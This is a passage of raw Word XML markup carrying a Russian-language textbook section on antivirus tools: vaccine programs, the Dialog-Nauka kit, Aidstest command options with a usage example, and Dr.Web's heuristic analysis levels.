        <w:t xml:space="preserve">Vsafe, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>входящая в состав пакета ут</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>лит операционной системы MS DOS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Вакцины </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">иммунизаторы - </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>это резидентные программы, предотвр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>щающие заражение файлов. Вакцины применяют, если отсутствуют програ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>мы-доктора, "лечащие" этот вирус. Вакцинация возможна только от известных вирусов. Вакцина модифицирует программу или диск таким образом, чтобы это не отражалось на их работе, а вирус будет воспринимать их зараженными и п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>этому не внедрится. В настоящее время программы-вакцины имеют ограниче</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ное применение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Своевременное обнаружение зараженных вирусами файлов и дисков, полное уничтожение обнаруженных вирусов на каждом компьютере позволяют избежать распространения вирусной эпидемии на другие компьютеры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирусный комплект АО "Диалог-Наука"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Среди обилия современных программных средств борьбы с компьюте</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ными вирусами предпочтение следует отдать антивирусному комплекту АО "Диалог-Наука", в который входят четыре программных продукта: полифаги Aidstest и Doctor Web (сокращенно Dr.Web), ревизор диска ADinf и лечащий блок ADinf Cure Module. Рассмотрим кратко, как и когда надо применять эти антивирусные программы.</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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Программа-полифаг Aidstest. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">– это программа, которая умеет обнаруживать и уничтожать более 1300 компьютерных вирусов, получивших наиболее широкое распространение в России. Версии </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>регулярно обно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ляются и пополняются информацией о новых вирусах.</w:t>
      </w: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Для вызова </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>следует ввести команду:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AIDSTEST [</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">где path - имя диска, полное имя или спецификация файла, маска группы файлов: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">* – все разделы жесткого диска, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">** – все диски, включая сетевые и диски CD ROM; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>options - любая комбинация следующих ключей:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/F - исправлять зараженные программы и стирать испорченные; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/G – проверять все файлы подряд (не только СОМ, ЕХЕ и SYS); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/S – медленная работа для поиска испорченных вирусов; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/X – стирать все файлы с нарушениями в структуре вируса; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/Q – спрашивать разрешение на удаление испорченных файлов; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/В – не предлагать обработку следующей дискеты.</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b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пример 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Запуск антивирусной программы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для проверки и "л</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">чения" диска </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В:.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обнаруженные зараженные программы будут исправлены. Проверке подлежат все файлы диска. Если файл исправить не удастся, то пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамма будет просить разрешение на его удаление:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>aidstest b: /f /g /q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Программа-полифаг Doctor Web. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта программа предназначена прежде всего для борьбы с полиморфными вирусами, которые сравнительно недавно появились в компьютерном мире. Использование </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">для проверки дисков и удаления обнаруженных вирусов в целом подобно программе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При этом дублирования проверки практически не происходит, так как</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aidstest </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>работают на разных наборах вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">может эффективно бороться со сложными вирусами-мутантами, которые </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">оказываются не под силу программе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В отличие от </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Aidstest</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>способна обнаруживать изменения в собственном программном коде, эффективно определять файлы, зараженные новыми, неи</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вестными вирусами, проникая в зашифрованные и упакованные файлы, а также преодолевая "вакцинное прикрытие". Это достигается благодаря наличию д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>статочно мощного эвристического анализатора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В режиме эвристического анализа программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr.Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исследует файлы и системные области дисков, пытаясь обнаружить новые или неизвестные ей в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>русы по характерным для вирусов кодовым последовательностям. Если таковые будут найдены, то выводится предупреждение о том, что объект, возможно, инфицирован неизвестным вирусом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Предусмотрены три уровня эвристического анализа. В режиме эвристич</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ского анализа возможны ложные срабатывания, т.е. детектирование файлов, не являющихся зараженными. Уровень "эвристики" подразумевает собой уровень анализа кода без наличия ложных срабатываний. Чем выше уровень "эврист</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ки", тем выше процент наличия ошибок или ложных срабатываний. Рекоме</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дуются первые два уровня работы эвристического анализатора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Третий уровень эвристического анализа предусматривает дополнител</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ную проверку файлов на "подозрительное" время их создания. Некоторые вир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сы при заражении файлов устанавливают некорректное время создания, как признак зараженности данных файлов. Например, для зараженных файлов с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кунды могут иметь значение 62, а год создания может быть увеличен на 100 лет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В комплект поставки антивирусной программы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>могут входить также файлы-дополнения к основной вирусной базе программы, расширяющие ее возможности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Работать с программой </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>можно в двух режимах:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
